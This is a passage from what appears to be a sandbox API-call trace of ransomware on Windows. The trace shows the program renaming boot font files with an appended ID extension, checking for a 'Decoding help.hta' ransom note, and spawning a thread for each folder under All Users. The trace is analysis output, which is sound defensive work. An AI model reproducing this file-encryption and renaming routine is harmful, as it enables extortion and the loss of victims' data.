lpString2="chs_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" [0039.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" [0039.280] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" [0039.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.280] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0039.280] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.280] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.280] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" [0039.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" (normalized: "c:\\boot\\fonts\\decoding help.hta")) returned 0x1 [0039.281] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cht_boot.ttf") returned 1 [0039.281] lstrlenW (lpString="cht_boot.ttf") returned 12 [0039.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.281] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.281] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="cht_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" [0039.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" [0039.281] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" [0039.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.285] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0039.285] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.285] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.285] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" [0039.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" (normalized: "c:\\boot\\fonts\\decoding help.hta")) returned 0x1 [0039.286] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jpn_boot.ttf") returned -1 [0039.286] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0039.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.286] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.286] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="jpn_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" [0039.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" [0039.286] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" [0039.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.286] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0039.286] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.286] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.286] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" [0039.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" (normalized: "c:\\boot\\fonts\\decoding help.hta")) returned 0x1 [0039.286] lstrcmpiW (lpString1="Decoding help.hta", lpString2="kor_boot.ttf") returned -1 [0039.286] lstrlenW (lpString="kor_boot.ttf") returned 12 [0039.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.286] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.286] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="kor_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" [0039.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" [0039.286] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" [0039.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.286] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0039.286] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.287] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.287] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" [0039.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" (normalized: "c:\\boot\\fonts\\decoding help.hta")) returned 0x1 [0039.287] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wgl4_boot.ttf") returned -1 [0039.287] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0039.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.287] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.287] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="wgl4_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" [0039.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" [0039.287] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" [0039.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.287] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0039.288] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 51 os_tid = 0xb00 [0039.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\*.*", lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.277] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.277] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.277] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0039.277] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0039.277] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0039.277] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0039.277] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.277] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.277] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe") returned="\\\\?\\C:\\Users\\All Users\\Adobe" [0039.277] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*" [0039.277] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41d84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.284] CloseHandle (hObject=0x198) returned 1 [0039.284] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0039.284] lstrcmpW (lpString1=".", lpString2="Application Data") returned -1 [0039.284] lstrcmpW (lpString1="..", lpString2="Application Data") returned -1 [0039.284] lstrcmpiW (lpString1="windows", lpString2="Application Data") returned 1 [0039.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.284] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.284] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Application Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data") returned="\\\\?\\C:\\Users\\All Users\\Application Data" [0039.284] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Application Data\\*.*" [0039.284] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4298800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.293] CloseHandle (hObject=0x198) returned 1 [0039.293] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0039.293] lstrcmpW (lpString1=".", lpString2="Desktop") returned -1 [0039.293] lstrcmpW (lpString1="..", lpString2="Desktop") returned -1 [0039.293] lstrcmpiW (lpString1="windows", lpString2="Desktop") returned 1 [0039.295] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.295] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.295] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Desktop" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop") returned="\\\\?\\C:\\Users\\All Users\\Desktop" [0039.295] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Desktop\\*.*" [0039.295] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.295] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ea0f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.304] CloseHandle (hObject=0x198) returned 1 [0039.304] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0039.304] lstrcmpW (lpString1=".", lpString2="Documents") returned -1 [0039.304] lstrcmpW (lpString1="..", lpString2="Documents") returned -1 [0039.304] lstrcmpiW (lpString1="windows", lpString2="Documents") returned 1 [0039.304] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.304] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.304] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Documents" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents") returned="\\\\?\\C:\\Users\\All Users\\Documents" [0039.304] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Documents\\*.*" [0039.304] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5bd0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.313] CloseHandle (hObject=0x198) returned 1 [0039.313] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0039.313] lstrcmpW (lpString1=".", lpString2="Favorites") returned -1 [0039.313] lstrcmpW (lpString1="..", lpString2="Favorites") returned -1 [0039.313] lstrcmpiW (lpString1="windows", lpString2="Favorites") returned 1 [0039.313] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.313] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.313] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Favorites" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites") returned="\\\\?\\C:\\Users\\All Users\\Favorites" [0039.313] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Favorites\\*.*" [0039.313] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5be80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.323] CloseHandle (hObject=0x198) returned 1 [0039.324] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0039.324] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0039.324] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0039.324] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0039.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.324] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft") returned="\\\\?\\C:\\Users\\All Users\\Microsoft" [0039.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0039.324] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.324] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c00118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.334] CloseHandle (hObject=0x198) returned 1 [0039.334] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0039.334] lstrcmpW (lpString1=".", lpString2="Microsoft Help") returned -1 [0039.334] lstrcmpW (lpString1="..", lpString2="Microsoft Help") returned -1 [0039.334] lstrcmpiW (lpString1="windows", lpString2="Microsoft Help") returned 1 [0039.335] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" 